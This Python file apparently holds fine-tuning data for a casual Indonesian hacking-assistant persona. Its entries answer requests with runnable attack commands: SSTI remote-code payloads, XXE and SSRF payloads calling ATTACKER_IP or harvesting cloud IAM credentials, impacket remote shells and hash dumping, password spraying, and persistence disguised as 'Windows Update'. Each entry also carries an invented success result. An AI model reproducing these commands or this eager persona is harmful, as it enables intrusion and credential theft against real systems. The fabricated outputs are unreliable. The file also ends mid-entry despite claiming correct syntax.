from ds_part1 import _e

# ══════════════════════════════════════════════════════════════════════════════
# DS PART 7 — CyberHackSecurity Training Data
# 1500 entries target — semua 15 kategori, syntax 100% bener
# Personality: santai, natural, bisa bercanda kayak partner
# ══════════════════════════════════════════════════════════════════════════════

# ─── 1. RECON ────────────────────────────────────────────────────────────────
RECON7 = [
    _e("Bro, gw mau recon domain target.com dari nol — mulai dari mana?",
       ["Santai bro, gw guide step by step!",
        "Mulai passive dulu — subfinder + amass buat subdomain",
        "Abis itu httpx buat filter yang live",
        "Baru masuk active scan dengan nmap"],
       ["subfinder passive scan", "amass enum", "httpx filter live", "dnsx resolve"],
       ["subfinder -d target.com -silent -all -o subfinder.txt",
        "amass enum -passive -d target.com -o amass.txt",
        "cat subfinder.txt amass.txt | sort -u | tee all_subs.txt",
        "httpx -l all_subs.txt -silent -status-code -title -tech-detect -o live.txt",
        "dnsx -l all_subs.txt -a -cname -resp -o resolved.txt"],
       [("subfinder", "passive subdomain enumeration"),
        ("amass", "active+passive DNS recon"),
        ("httpx", "HTTP probing dan fingerprinting"),
        ("dnsx", "bulk DNS resolution")],
       "httpx -tech-detect keren bro — langsung tau tech stack target pakai apa",
       "CyberHackSecurity recon workflow: passive → active → live filter → resolve",
       "casual",
       "Subfinder: 67 subs. Amass: 89 subs. Total unique: 112. Live: 45 subdomains aktif dengan tech stack terdeteksi."),

    _e("Gimana cara pakai shodan buat cari server target yang exposed bro?",
       ["Shodan itu mesin pencari IoT dan server — powerful banget bro!",
        "Bisa cari berdasarkan hostname, org, IP range, service",
        "Kombinasikan dengan shodan CLI dan python SDK"],
       ["install shodan CLI", "search by hostname", "search by org", "download results"],
       ["shodan init YOUR_API_KEY",
        "shodan search hostname:target.com --fields ip_str,port,org,product",
        "shodan search org:'Target Company' --fields ip_str,port,product,version",
        "shodan host 1.2.3.4",
        "shodan search 'ssl:target.com' --fields ip_str,port",
        "shodan count hostname:target.com"],
       [("shodan", "internet-wide device dan service search")],
       "shodan search ssl:domain.com bagus banget buat cari semua IP yang pakai cert domain target",
       "CyberHackSecurity: shodan init API_KEY dulu sebelum bisa query — gratis 100 results/query",
       "casual",
       "Shodan: 23 IPs exposed. Services: Apache 2.4, nginx, Redis tanpa auth, Elasticsearch public."),

    _e("Cara pakai recon-ng buat OSINT gathering yang proper bro?",
       ["recon-ng itu kayak metasploit tapi buat OSINT — modular dan powerful!",
        "Ada ratusan modules: DNS, social media, breached data, geolocation",
        "Hasil tersimpan di database yang bisa di-export"],
       ["buka recon-ng", "setup workspace", "load modules", "run dan export"],
       ["recon-ng",
        "recon-ng > workspaces create target_corp",
        "recon-ng > db insert domains",
        "recon-ng > marketplace install all",
        "recon-ng > modules load recon/domains-hosts/hackertarget",
        "recon-ng > run",
        "recon-ng > modules load recon/hosts-hosts/resolve",
        "recon-ng > run",
        "recon-ng > reporting/html",
        "recon-ng > run"],
       [("recon-ng", "modular OSINT framework")],
       "recon-ng marketplace install all untuk download semua modules — butuh internet",
       "CyberHackSecurity: recon-ng workspaces bisa pisah project per client assessment",
       "professional",
       "recon-ng: 156 hosts, 23 emails, 8 credentials from breached DB, 4 social profiles found."),

    _e("Coba pakai amass untuk mapping infrastruktur target secara mendalam bro",
       ["amass paling comprehensive buat subdomain + infrastructure mapping",
        "mode: enum (passive), intel (OSINT), viz (visualisasi), db (database)",
        "output bisa JSON untuk parsing lanjutan"],
       ["passive enum dulu", "active brute force", "intel gathering", "visualize"],
       ["amass enum -passive -d target.com -o passive.txt",
        "amass enum -active -d target.com -brute -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -o active.txt",
        "amass intel -d target.com -whois -o intel.txt",
        "amass intel -org 'Target Company' -o org_intel.txt",
        "amass db -d target.com -show",
        "amass viz -d target.com -d3"],
       [("amass", "comprehensive attack surface mapping")],
       "amass enum -brute lambat tapi paling lengkap — jalanin background saat ngerjain yang lain",
       "CyberHackSecurity: amass intel -org buat cari semua aset perusahaan dari nama orgnya",
       "professional",
       "Amass: 234 subdomains, 45 ASNs, 12 CIDR ranges, 8 related domains mapped."),

    _e("Gimana cara pakai maltego buat visualisasi OSINT graph bro?",
       ["Maltego itu tools visualisasi OSINT yang paling keren — kayak mind map tapi otomatis!",
        "Bisa track hubungan antar entitas: domain, IP, email, person, company",
        "Ada free version (CE) dengan limit transforms per hari"],
       ["buka maltego", "buat graph baru", "add entity", "run transforms"],
       ["# Launch maltego",
        "maltego &",
        "# Atau via CLI untuk automation",
        "maltego -config /path/to/config.xml",
        "# Python via maltego-trx library",
        "pip install maltego-trx",
        "# Add entity domain: target.com",
        "# Run transform: To DNS Name [using resolves]",
        "# Run transform: To IP Address [DNS]",
        "# Run transform: To Emails [from domain]"],
       [("maltego", "OSINT graph visualization dan entity mapping")],
       "Maltego CE gratis tapi limit 12 transform results — upgrade untuk unlimited",
       "CyberHackSecurity: maltego paling bagus untuk present findings ke client — visual dan mudah dipahami",
       "professional",
       "Maltego graph: target.com → 45 subdomains → 23 IPs → 8 email addresses → 3 employee LinkedIn profiles."),

    _e("Cara cari informasi DNS lengkap suatu domain bro — MX, TXT, NS records?",
       ["DNS records menyimpan banyak info penting — MX buat mail server, TXT buat SPF/DKIM, NS buat nameserver",
        "dnsx dan dig adalah tools terbaik untuk bulk DNS query",
        "SPF record sering expose internal IP ranges!"],
       ["query semua record types", "cek SPF/DKIM", "zone transfer attempt", "bulk resolve"],
       ["dig target.com ANY",
        "dig target.com MX",
        "dig target.com TXT",
        "dig target.com NS",
        "dig target.com SOA",
        "dnsx -d target.com -a -aaaa -cname -mx -ns -txt -resp -silent",
        "# Zone transfer attempt (kadang misconfigured)",
        "dig axfr target.com @ns1.target.com",
        "host -t axfr target.com ns1.target.com"],
       [("dig", "DNS query tool"),
        ("dnsx", "bulk DNS resolution")],
       "dig axfr zone transfer — kalau berhasil dapat SEMUA DNS records sekaligus! Rare tapi bagus dicoba",
       "CyberHackSecurity: SPF record sering ada IP internal range — `v=spf1 ip4:10.0.0.0/8` expose internal network!",
       "analytical",
       "DNS recon: MX → mail.target.com (10.1.1.5), TXT SPF expose 192.168.x.x/24, zone transfer FAILED."),
]

# ─── 2. SCAN ─────────────────────────────────────────────────────────────────
SCAN7 = [
    _e("Bro scan port target dengan nmap yang proper dong, bukan asal scan",
       ["Scan yang proper: cepet dulu pakai -T4, abis itu detail pakai -sV -sC",
        "Jangan langsung -p- di awal — lemot dan noisy banget",
        "Save output ke semua format sekaligus: -oA"],
       ["quick top ports", "full port scan background", "service version scan", "vuln scripts"],
       ["nmap -sV -sC --top-ports 1000 -T4 target.com -oA quick_scan",
        "nmap -p- -T4 --min-rate 5000 target.com -oN full_ports.txt &",
        "nmap -sV -sC -p 22,80,443,8080,3306,6379,27017 target.com -oA service_scan",
        "nmap --script vuln -p 80,443 target.com -oN vuln_scan.txt",
        "nmap -sU --top-ports 100 target.com -oN udp_scan.txt",
        "nmap -O --osscan-guess target.com -oN os_detect.txt"],
       [("nmap", "network port scanning dan service detection")],
       "-oA sekaligus save .nmap .xml .gnmap — bagus untuk import ke tools lain",
       "CyberHackSecurity nmap: quick scan dulu → full scan background → service scan → vuln scripts",
       "professional",
       "nmap: 15 open ports. SSH 22, HTTP 80, HTTPS 443, MySQL 3306, Redis 6379 (no auth!), MongoDB 27017."),

    _e("Gimana pakai rustscan buat port scan yang super cepet bro?",
       ["RustScan itu nmap wrapper yang scan portnya 100x lebih cepet!",
        "Scan semua 65535 port dalam hitungan detik, abis itu pass ke nmap untuk detail",
        "Install via Docker atau binary"],
       ["install rustscan", "basic scan", "pass ke nmap", "scan range"],
       ["# Install",
        "docker pull rustscan/rustscan:latest",
        "# Basic scan",
        "rustscan -a target.com",
        "# Scan semua ports super cepet",
        "rustscan -a target.com --range 1-65535 --ulimit 5000",
        "# Pass ke nmap langsung",
        "rustscan -a target.com -- -sV -sC -oA rustscan_output",
        "rustscan -a target.com --ulimit 5000 -- -sV --script vuln"],
       [("rustscan", "ultra-fast port scanner"), ("nmap", "service detection")],
       "rustscan --ulimit 5000 buat maksimalkan speed — default terlalu lambat",
       "CyberHackSecurity: rustscan find ports dulu → pipe ke nmap buat service scan → lebih efisien!",
       "casual",
       "RustScan: 65535 ports scanned dalam 3.2 detik. Open: 22, 80, 443, 3306, 8080. Passed to nmap."),

    _e("Pakai masscan buat scan IP range yang gede bro — gimana caranya?",
       ["masscan itu scanner paling cepet di dunia — bisa scan internet dalam hitungan menit!",
        "Rate: 100k packet/second secara default — hati-hati di network production",
        "Output compatible dengan nmap untuk import"],
       ["basic scan", "scan range", "rate limit", "save dan import ke nmap"],
       ["masscan -p 80,443,22,8080 192.168.1.0/24 --rate 1000",
        "masscan -p 1-65535 10.0.0.0/8 --rate 10000 -oL masscan_out.txt",
        "masscan -p 80,443 0.0.0.0/0 --rate 100000 --exclude 255.255.255.255",
        "masscan -p 22,80,443 192.168.0.0/16 --rate 5000 -oX masscan.xml",
        "# Convert ke nmap format",
        "nmap -sV -iL <(masscan -p80 10.0.0.0/24 --rate 1000 | awk '{print $6}')"],
       [("masscan", "ultra-fast internet-scale port scanner")],
       "masscan --rate terlalu tinggi bisa crash router — mulai 1000, naik pelan-pelan",
       "CyberHackSecurity: masscan untuk discovery awal di large networks, nmap untuk detail per host",
       "professional",
       "Masscan: 10.0.0.0/24 scanned dalam 8 detik. 156 hosts dengan port 80/443 open ditemukan."),

    _e("Cara pakai nuclei untuk scan vulnerability dengan template custom bro?",
       ["nuclei templates adalah YAML files yang define vulnerability check",
        "Bisa pakai community templates atau buat sendiri!",
        "Update templates rutin karena CVE baru terus keluar"],
       ["update templates", "scan basic", "buat custom template", "scan bulk"],
       ["nuclei -update-templates",
        "nuclei -u https://target.com -t cves/ -severity critical,high -o results.txt",
        "nuclei -l urls.txt -t exposures/ -t misconfiguration/ -o bulk.txt",
        "# Buat custom template",
        "cat > custom_check.yaml << 'EOF'\nid: custom-header-check\ninfo:\n  name: Missing Security Headers\n  severity: medium\nrequests:\n  - method: GET\n    path:\n      - '{{BaseURL}}'\n    matchers:\n      - type: word\n        words:\n          - 'X-Frame-Options'\n        negative: true\nEOF",
        "nuclei -u https://target.com -t custom_check.yaml"],
       [("nuclei", "template-based vulnerability scanner")],
       "nuclei custom template bisa detect vulnerability spesifik yang gak ada di community templates",
       "CyberHackSecurity: nuclei -update-templates wajib sebelum assessment — templates baru tiap hari!",
       "professional",
       "Nuclei: 5 critical CVEs, 12 high misconfigs, 3 exposed panels ditemukan di target."),

    _e("Bro gimana cara scan SSL/TLS target yang comprehensive?",
       ["testssl.sh adalah tool paling lengkap buat audit SSL/TLS configuration",
        "Check cipher suites, protocols, certificates, dan known vulnerabilities",
        "Output bisa JSON untuk automated processing"],
       ["basic scan", "check specific vuln", "bulk scan", "save report"],
       ["testssl.sh https://target.com",
        "testssl.sh --severity HIGH --color 0 https://target.com",
        "testssl.sh --heartbleed --ccs-injection --ticketbleed https://target.com",
        "testssl.sh --protocols --ciphers --server-defaults https://target.com",
        "testssl.sh --jsonfile output.json --htmlfile report.html https://target.com",
        "# Bulk scan dari file",
        "for domain in $(cat domains.txt); do testssl.sh --jsonfile ${domain}.json https://${domain}; done"],
       [("testssl.sh", "comprehensive SSL/TLS security assessment")],
       "testssl.sh --severity HIGH filter hanya temuan HIGH ke atas — lebih fokus untuk laporan",
       "CyberHackSecurity: testssl bisa detect BEAST, CRIME, POODLE, Heartbleed, RC4, weak ciphers",
       "professional",
       "testssl.sh: TLS 1.0/1.1 enabled, RC4 supported, certificate expires 7 days, HSTS missing."),

    _e("Cara web application fingerprinting yang efektif pakai whatweb dan wappalyzer bro?",
       ["Fingerprinting tau tech stack target sebelum attack — penting banget!",
        "whatweb CLI tool, wappalyzer browser extension dan API",
        "Info yang didapat: CMS, framework, server, JS libraries, CDN"],
       ["whatweb basic", "aggressive mode", "bulk scan", "parse output"],
       ["whatweb https://target.com",
        "whatweb https://target.com -v",
        "whatweb https://target.com -a 3 --log-json=output.json",
        "whatweb -i urls.txt -a 3 --log-json=bulk_output.json",
        "cat output.json | jq '.[] | {url: .target, plugins: .plugins}'",
        "# Wappalyzer via CLI",
        "npx wappalyzer https://target.com"],
       [("whatweb", "web technology fingerprinting"),
        ("wappalyzer", "technology detection")],
       "whatweb -a 3 aggressive mode — lebih banyak request tapi info lebih lengkap",
       "CyberHackSecurity: fingerprinting dulu sebelum exploit — tau WordPress versi berapa baru cari CVE-nya",
       "analytical",
       "whatweb: WordPress 6.3.1, PHP 8.1.2, Apache 2.4.41, jQuery 3.6.0, CloudFlare CDN detected."),
]

# ─── 3. WEB ──────────────────────────────────────────────────────────────────
WEB7 = [
    _e("Bro cara pakai wpscan buat audit keamanan WordPress yang bener dong",
       ["wpscan itu scanner khusus WordPress — detect plugin vuln, user enum, weak passwords",
        "Butuh WPScan API token untuk dapat vulnerability database terbaru",
        "Mode: passive (default) dan aggressive"],
       ["basic scan", "enumerate users", "enumerate plugins", "brute force login"],
       ["wpscan --url https://target.com",
        "wpscan --url https://target.com --enumerate u",
        "wpscan --url https://target.com --enumerate p --plugins-detection aggressive",
        "wpscan --url https://target.com --enumerate vp --api-token YOUR_TOKEN",
        "wpscan --url https://target.com -U users.txt -P /usr/share/wordlists/rockyou.txt",
        "wpscan --url https://target.com --enumerate u,p,t --api-token TOKEN -o wp_report.json --format json"],
       [("wpscan", "WordPress security scanner")],
       "wpscan --api-token penting untuk dapat CVE data terbaru — daftar gratis di wpscan.io",
       "CyberHackSecurity: 30% website pakai WordPress — wpscan wajib dalam web assessment toolkit",
       "casual",
       "wpscan: 3 vulnerable plugins (Contact Form 7, WooCommerce, Yoast SEO), 5 users enumerated, xmlrpc enabled."),

    _e("Gimana cara detect dan exploit Server-Side Template Injection (SSTI) bro?",
       ["SSTI terjadi waktu user input dirender sebagai template — bisa RCE!",
        "Test dengan payload matematika dulu: {{7*7}} → 49 berarti vulnerable",
        "Tiap template engine punya payload berbeda: Jinja2, Twig, Freemarker"],
       ["detect template engine", "test SSTI payload", "exploit untuk RCE"],
       ["# Test basic SSTI",
        "curl 'https://target.com/page?name={{7*7}}'",
        "curl 'https://target.com/page?name=${7*7}'",
        "curl 'https://target.com/page?name=<%= 7*7 %>'",
        "# Jinja2 RCE payload",
        "curl 'https://target.com/page?name={{config.__class__.__init__.__globals__[\"os\"].popen(\"id\").read()}}'",
        "# Twig payload",
        "curl 'https://target.com/page?name={{_self.env.registerUndefinedFilterCallback(\"exec\")}}{{_self.env.getFilter(\"id\")}}'",
        "# Via ffuf untuk automation",
        "ffuf -u 'https://target.com/page?name=FUZZ' -w ssti_payloads.txt -mr '49'"],
       [("curl", "manual SSTI testing"), ("ffuf", "automated SSTI fuzzing")],
       "{{7*7}}=49 confirm Jinja2/Twig, ${7*7}=49 confirm Freemarker/Velocity",
       "CyberHackSecurity: SSTI sering ada di error pages, email templates, report generators",
       "professional",
       "SSTI confirmed: Jinja2 engine. {{config}} exposed SECRET_KEY. RCE via popen() achieved as www-data."),

    _e("Cara test XXE (XML External Entity) injection yang proper bro?",
       ["XXE terjadi waktu XML parser proses external entity references",
        "Bisa read file /etc/passwd, SSRF, bahkan RCE via Java",
        "Test di semua endpoint yang accept XML atau SOAP"],
       ["basic XXE payload", "file read", "SSRF via XXE", "blind XXE"],
       ["# Basic XXE file read",
        "curl -X POST https://target.com/api/xml -H 'Content-Type: application/xml' -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><root>&xxe;</root>'",
        "# XXE SSRF",
        "curl -X POST https://target.com/api/xml -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://ATTACKER_IP/\">]><root>&xxe;</root>'",
        "# Blind XXE via OOB",
        "curl -X POST https://target.com/api/xml -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://ATTACKER_IP/evil.dtd\"> %xxe;]><root></root>'",
        "# Test JSON ke XML conversion endpoints",
        "curl -X POST https://target.com/api/convert -H 'Content-Type: application/json' -d '{\"data\": \"<?xml version=\\\"1.0\\\"?>\"}'"],
       [("curl", "manual XXE payload injection"),
        ("burpsuite", "intercept dan modify XML requests")],
       "XXE sering di-miss karena butuh Content-Type: application/xml — coba juga di SOAP endpoints",
       "CyberHackSecurity: XXE OOB (out-of-band) untuk blind exploitation — attacker server harus bisa receive callback",
       "professional",
       "XXE confirmed: /etc/passwd readable, /etc/shadow attempted (permission denied), SSRF ke internal 10.0.0.0/8."),

    _e("Cara pakai ffuf untuk fuzzing parameter dan endpoint yang efektif bro?",
       ["ffuf itu Swiss Army knife untuk web fuzzing — cepet dan flexible!",
        "Bisa fuzz: directories, parameters, headers, cookies, POST body",
        "Filter hasil: -fc (filter status code), -fs (filter size), -fw (filter words)"],
       ["directory fuzzing", "parameter fuzzing", "header fuzzing", "POST body fuzzing"],
       ["# Directory fuzzing",
        "ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -mc 200,301,302,403",
        "# Parameter fuzzing",
        "ffuf -u 'https://target.com/page?FUZZ=value' -w params.txt -mc 200 -fs 1234",
        "# Value fuzzing",
        "ffuf -u 'https://target.com/page?id=FUZZ' -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt",
        "# Header fuzzing",
        "ffuf -u https://target.com/ -H 'FUZZ: ../../../etc/passwd' -w headers.txt",
        "# POST body fuzzing",
        "ffuf -u https://target.com/login -X POST -d 'user=FUZZ&pass=test' -w usernames.txt -mc 302",
        "# VHost fuzzing",
        "ffuf -u https://target.com/ -H 'Host: FUZZ.target.com' -w subdomains.txt -fs 4242"],
       [("ffuf", "fast web fuzzer untuk directories, params, headers")],
       "ffuf -fs filter by response size — kalau semua response sama size, pasti ada yang berbeda!",
       "CyberHackSecurity: ffuf VHost fuzzing sering nemuin internal apps yang gak diindex di DNS publik",
       "professional",
       "ffuf: /admin (200), /backup (403), /.git (301), ?debug=true expose stack trace, VHost internal.target.com found."),

    _e("Bro cara detect dan exploit SSRF (Server-Side Request Forgery)?",
       ["SSRF bikin server target buat request ke URL yang kita kontrol",
        "Bisa akses internal services, cloud metadata, bypass firewall",
        "AWS metadata: http://169.254.169.254/latest/meta-data/"],
       ["identify SSRF points", "test basic SSRF", "exploit ke internal", "cloud metadata"],
       ["# Test SSRF basic",
        "curl 'https://target.com/fetch?url=http://ATTACKER_IP/'",
        "# Internal service probe",
        "curl 'https://target.com/fetch?url=http://localhost:22'",
        "curl 'https://target.com/fetch?url=http://127.0.0.1:3306'",
        "curl 'https://target.com/fetch?url=http://192.168.1.1/'",
        "# AWS metadata (kritis!)",
        "curl 'https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/'",
        "curl 'https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/'",
        "# Bypass filter dengan redirect",
        "curl 'https://target.com/fetch?url=http://ATTACKER_IP/redirect'"],
       [("curl", "SSRF payload testing"),
        ("burpsuite", "intercept requests untuk SSRF testing")],
       "AWS metadata endpoint 169.254.169.254 adalah jackpot — bisa dapat IAM credentials!",
       "CyberHackSecurity: SSRF sering di parameter url=, path=, image=, webhook=, callback=",
       "professional",
       "SSRF confirmed: internal 10.0.0.0/24 accessible. AWS metadata exposed IAM role credentials!"),
]

# ─── 4. EXPLOIT ──────────────────────────────────────────────────────────────
EXPLOIT7 = [
    _e("Bro cara pakai searchsploit buat cari exploit yang tersedia?",
       ["searchsploit itu offline search untuk Exploit-DB database — cepet tanpa internet!",
        "Update rutin dengan searchsploit -u",
        "Copy exploit ke current dir dengan -m"],
       ["search exploit", "update database", "copy exploit", "filter by type"],
       ["searchsploit apache 2.4",
        "searchsploit wordpress 5.8",
        "searchsploit -u",
        "searchsploit apache 2.4 --exclude='(DoS)'",
        "searchsploit -m 49512",
        "searchsploit -x 49512",
        "searchsploit apache --type webapps",
        "searchsploit -j apache 2.4 | jq '.RESULTS_EXPLOIT[]'"],
       [("searchsploit", "offline Exploit-DB search dan copy tool")],
       "searchsploit -m copy exploit ke current dir, -x untuk preview langsung di terminal",
       "CyberHackSecurity: searchsploit -u update dulu sebelum assessment — exploit baru terus ditambah",
       "casual",
       "searchsploit Apache 2.4.41: 3 RCE exploits, 2 path traversal, 1 LFI. Copied exploit 49512."),

    _e("Gimana cara pakai impacket untuk Windows/AD exploitation bro?",
       ["impacket itu Swiss Army knife untuk Windows protocol exploitation",
        "Tools: psexec, smbexec, wmiexec, GetUserSPNs, secretsdump, ntlmrelayx",
        "Semua butuh credential atau hash yang valid"],
       ["psexec remote shell", "dump credentials", "kerberoasting", "ntlm relay"],
       ["# PSExec remote shell",
        "impacket-psexec administrator:Password123@target.com",
        "impacket-psexec -hashes :NTLM_HASH administrator@target.com",
        "# SMBExec (lebih stealth)",
        "impacket-smbexec administrator:Password123@target.com",
        "# WMIExec",
        "impacket-wmiexec administrator:Password123@target.com",
        "# Dump credentials",
        "impacket-secretsdump administrator:Password123@target.com",
        "impacket-secretsdump -hashes :HASH administrator@target.com",
        "# Kerberoasting",
        "impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP -request -output hashes.txt"],
       [("impacket-psexec", "remote command execution via SMB"),
        ("impacket-secretsdump", "remote credential dumping"),
        ("impacket-GetUserSPNs", "Kerberoasting SPN enumeration")],
       "impacket-smbexec lebih stealth dari psexec — tidak drop binary ke disk target",
       "CyberHackSecurity: impacket-secretsdump bisa dump semua hashes dari DC tanpa install apapun!",
       "professional",
       "impacket: Remote shell as SYSTEM via psexec. secretsdump: 156 hashes including Domain Admin."),

    _e("Cara setup dan pakai pwntools untuk binary exploitation bro?",
       ["pwntools adalah CTF dan exploit dev framework untuk Python",
        "Handle: socket, process, ELF, shellcode, ROP chains, format string",
        "Paling sering dipakai untuk pwn challenges dan real binary exploits"],
       ["install", "basic exploit template", "ROP chain", "shellcode"],
       ["pip install pwntools",
        "# Basic exploit template",
        "from pwn import *",
        "p = process('./vulnerable_binary')",
        "# Atau remote",
        "p = remote('target.com', 1337)",
        "# ELF analysis",
        "elf = ELF('./binary')",
        "print(hex(elf.sym['main']))",
        "# Send payload",
        "payload = b'A' * 64 + p64(0xdeadbeef)",
        "p.sendline(payload)",
        "p.interactive()",
        "# ROP chain",
        "rop = ROP(elf)",
        "rop.call('system', [next(elf.search(b'/bin/sh'))])"],
       [("pwntools", "binary exploitation framework untuk CTF dan pentest")],
       "pwntools cyclic() buat cari offset buffer overflow — cyclic(100) → crash → cyclic_find(crash_addr)",
       "CyberHackSecurity: pwntools context.arch = 'amd64' atau 'i386' harus diset dulu sebelum exploit",
       "professional",
       "pwntools: Buffer overflow confirmed, offset 72. ROP chain built. Shell spawned as root!"),
]

# ─── 5. POST_EXPLOIT ─────────────────────────────────────────────────────────
POST7 = [
    _e("Bro udah dapat shell, sekarang gimana lateral movement ke host lain?",
       ["Lateral movement = gerak dari satu host ke host lain dalam jaringan",
        "Tools: crackmapexec, impacket, evil-winrm, ssh dengan stolen keys",
        "Perlu credential atau hash yang valid dari host pertama"],
       ["enumerate network", "spray credentials", "move ke host lain", "pivot"],
       ["# Enumerate network dari shell",
        "ip route",
        "arp -a",
        "# CrackMapExec spray credential",
        "crackmapexec smb 192.168.1.0/24 -u administrator -p Password123",
        "crackmapexec smb 192.168.1.0/24 -u administrator -H NTLM_HASH",
        "crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt",
        "# Execute command di semua host",
        "crackmapexec smb 192.168.1.0/24 -u admin -p pass -x 'whoami'",
        "# Evil-WinRM untuk Windows",
        "evil-winrm -i target.com -u administrator -p Password123",
        "evil-winrm -i target.com -u administrator -H NTLM_HASH"],
       [("crackmapexec", "SMB lateral movement dan credential testing"),
        ("evil-winrm", "Windows Remote Management shell")],
       "crackmapexec output: [+] = success, [-] = fail, Pwn3d! = local admin! 🎉",
       "CyberHackSecurity: lateral movement selalu dalam scope authorized assessment — catat semua host yang diakses",
       "professional",
       "crackmapexec: 8/24 hosts dengan credential valid. 3 hosts Pwn3d! (local admin). DC reached."),

    _e("Cara pakai bloodhound untuk AD attack path analysis bro?",
       ["BloodHound visualisasi attack paths di Active Directory",
        "Collector: SharpHound (Windows) atau bloodhound-python (Linux)",
        "GUI menampilkan shortest path ke Domain Admin"],
       ["collect data", "import ke bloodhound", "find attack paths", "query cypher"],
       ["# Collect data dari Linux",
        "pip install bloodhound",
        "bloodhound-python -u user -p password -d domain.local -dc DC_IP -c all",
        "# Atau SharpHound di Windows target",
        "SharpHound.exe -c all --zipfilename loot.zip",
        "# Start Neo4j",
        "sudo neo4j start",
        "# Buka BloodHound GUI dan import zip",
        "bloodhound &",
        "# Query cypher manual",
        "MATCH (n:User {name:'USER@DOMAIN.LOCAL'}),(m:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'}),p=shortestPath((n)-[*1..]->(m)) RETURN p"],
       [("bloodhound", "Active Directory attack path visualization"),
        ("bloodhound-python", "cross-platform BloodHound data collector")],
       "BloodHound pre-built queries: 'Shortest Path to Domain Admins' adalah yang paling penting",
       "CyberHackSecurity: bloodhound-python -c all collect users, groups, sessions, ACLs, trusts sekaligus",
       "professional",
       "BloodHound: Attack path found! User → WriteDACL → Group → GenericAll → Domain Admin. 3 hops."),

    _e("Bro gimana cara establish persistence di Windows yang susah didetect?",
       ["Persistence banyak jenisnya: registry, scheduled task, service, WMI, DLL hijack",
        "Yang paling umum dan susah didetect: WMI event subscription",
        "Selalu dalam scope authorized pentest — catat semua yang dibuat untuk cleanup!"],
       ["registry run key", "scheduled task", "WMI persistence", "cleanup"],
       ["# Registry Run Key",
        "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Update /t REG_SZ /d 'C:\\Windows\\Temp\\payload.exe'",
        "# Scheduled Task",
        "schtasks /create /tn 'Windows Update' /tr 'C:\\Windows\\Temp\\payload.exe' /sc onlogon /ru SYSTEM",
        "# WMI Event Subscription (lebih stealth)",
        "powershell -c \"$filter=Set-WmiInstance -Namespace 'root\\subscription' -Class '__EventFilter' -Arguments @{Name='PersistFilter';EventNameSpace='root\\cimv2';QueryLanguage='WQL';Query=\\\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\\\"}\"",
        "# CLEANUP SETELAH PENTEST:",
        "reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Update /f",
        "schtasks /delete /tn 'Windows Update' /f"],
       [("reg", "Windows registry modification"),
        ("schtasks", "Windows scheduled task creation")],
       "WMI persistence paling susah didetect karena fileless — tidak ada file di disk",
       "CyberHackSecurity: WAJIB cleanup semua persistence setelah pentest selesai — jangan tinggalin backdoor!",
       "professional",
       "Persistence established: Registry Run + Scheduled Task as SYSTEM. Survives reboot. Cleanup checklist created."),
]

# ─── 6. BRUTE_FORCE ──────────────────────────────────────────────────────────
BRUTE7 = [
    _e("Cara pakai kerbrute untuk brute force Kerberos username di AD bro?",
       ["kerbrute untuk enumerate valid usernames via Kerberos pre-auth",
        "Tidak perlu password — hanya enumerate usernames yang valid",
        "Lebih stealth dari LDAP enumeration karena pakai Kerberos"],
       ["install kerbrute", "user enumeration", "password spray", "brute force"],
       ["# Download kerbrute",
        "wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64",
        "chmod +x kerbrute_linux_amd64",
        "mv kerbrute_linux_amd64 /usr/local/bin/kerbrute",
        "# User enumeration",
        "kerbrute userenum -d domain.local --dc DC_IP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt",
        "# Password spray (hati-hati lockout!)",
        "kerbrute passwordspray -d domain.local --dc DC_IP valid_users.txt 'Password2024!'",
        "# Brute force single user",
        "kerbrute bruteuser -d domain.local --dc DC_IP /usr/share/wordlists/rockyou.txt administrator"],
       [("kerbrute", "Kerberos username enumeration dan password spray")],
       "kerbrute passwordspray hati-hati lockout policy! Cek dulu berapa attempt sebelum locked",
       "CyberHackSecurity: kerbrute userenum jauh lebih cepat dari hydra untuk Windows AD user enum",
       "professional",
       "kerbrute: 234 valid usernames found. Password spray 'Password2024!': 3 hits! john.doe, jane.smith, svc.backup."),

    _e("Bro gimana cara crack Kerberoast hashes yang udah didapat?",
       ["Kerberoasting = request TGS ticket untuk SPN accounts, crack offline",
        "Syntax bener: impacket-GetUserSPNs untuk collect, hashcat untuk crack",
        "Hash format: $krb5tgs$23$ untuk RC4, $krb5tgs$18$ untuk AES"],
       ["collect SPN hashes", "identify hash type", "crack dengan hashcat", "crack dengan john"],
       ["# Step 1: Collect Kerberoastable accounts",
        "impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP -request",
        "impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP -request -output kerberoast_hashes.txt",
        "# Step 2: Crack dengan hashcat",
        "hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt",
        "hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule",
        "# AES-256 hashes (mode 19700)",
        "hashcat -m 19700 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt",
        "# John the Ripper",
        "john --format=krb5tgs kerberoast_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt"],
       [("impacket-GetUserSPNs", "Kerberoasting hash collection"),
        ("hashcat", "offline hash cracking"),
        ("john", "alternative hash cracker")],
       "hashcat -m 13100 untuk RC4 Kerberoast, -m 19700 untuk AES256 — jangan salah mode!",
       "CyberHackSecurity: service accounts sering punya weak password dan high privileges — target prioritas!",
       "professional",
